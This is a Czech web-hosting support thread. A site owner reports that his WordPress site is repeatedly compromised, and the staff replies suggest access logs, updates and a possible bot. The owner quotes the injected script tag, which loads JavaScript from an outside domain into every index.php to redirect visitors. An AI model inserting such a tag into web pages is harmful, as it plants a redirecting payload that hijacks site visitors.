Opakovaný útok na web fsckoprivnice.cz
Web fsckoprivnice.cz byl před několika dny napaden. Všechny index.php obsahují: <script type=’text/javascript‘ src=’https://check.resolutiondestin.com/receive_callback.js‘></script>
což přesměruje webový provoz mimo naši doménu. Provedl jsem několikrát reinstalaci redakčního systému WordPress. Současně s tím jsem uršil i všechna data na webu tj. web je poté komplet prázdný. Změnil jsem vždy všechna hesla jak v aplikaci, tak i FTP příatup. Bohužel se vždy vrátí stejný problém.
Chci vás požádat o pomoc zda nejsou vidět nějaké útoky nebo zda se nejedná o problém více zákazníků na vašem hostingu.
Děkuji
Leo Štěpán, *
3 Answers
Dobrý den,
doporučuji aktivovat na 24 hodin zdarma access log. Nenašli jsme na webu žádný podezřelý skript.
Po instalaci WordPress z vaší instalační sady dojde k napadení stránky do 5 minut. Nestihnu ani nainstalovat plugin WordFence pro ochranu. Velmi pravděpodobně je bezpečnostní chyba ve vámi instalované verzi WordPress.
Můžete provést upgrade na novější verzi WP u vaší instalace?
WordPress v našem instalátoru pravidelně aktualizujeme, ale vyžadujeme spíše stabilní a ověřenou verzi, než nejnovější. Nová verze bude brzy zpřístupněna. Nicméně aktuálně je tam dostupná verze 5.3 a to rozhodně není nijak zastaralá nebo problémová verze. Instalací je u nás tisíce a nikdo další nehlásil takové problémy s napadením. Instalaci si můžete provést i sám.
Může na vás cílit nějaký robot a hned jak je web dostupný, zneužívá bezpečnostní problém.